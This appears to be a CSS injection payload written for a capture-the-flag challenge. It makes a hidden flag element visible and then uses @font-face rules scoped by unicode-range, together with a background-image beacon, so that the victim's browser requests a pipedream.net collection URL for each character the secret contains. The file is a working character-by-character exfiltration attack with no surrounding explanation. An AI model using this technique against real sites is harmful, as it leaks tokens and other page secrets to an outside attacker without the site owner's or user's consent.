body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W30')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w30,p98w30,p106w30,p112w30,p115w30,p121w30,p122w30,p48w30,p49w30,p52w30,p53w30,p55w30,p125w30,monospace;width:30ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w30;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W30');unicode-range:U+0061}
@font-face{font-family:p98w30;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W30');unicode-range:U+0062}
@font-face{font-family:p106w30;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W30');unicode-range:U+006A}
@font-face{font-family:p112w30;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W30');unicode-range:U+0070}
@font-face{font-family:p115w30;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W30');unicode-range:U+0073}
@font-face{font-family:p121w30;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W30');unicode-range:U+0079}
@font-face{font-family:p122w30;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W30');unicode-range:U+007A}
@font-face{font-family:p48w30;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W30');unicode-range:U+0030}
@font-face{font-family:p49w30;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W30');unicode-range:U+0031}
@font-face{font-family:p52w30;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W30');unicode-range:U+0034}
@font-face{font-family:p53w30;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W30');unicode-range:U+0035}
@font-face{font-family:p55w30;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W30');unicode-range:U+0037}
@font-face{font-family:p125w30;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W30');unicode-range:U+007D}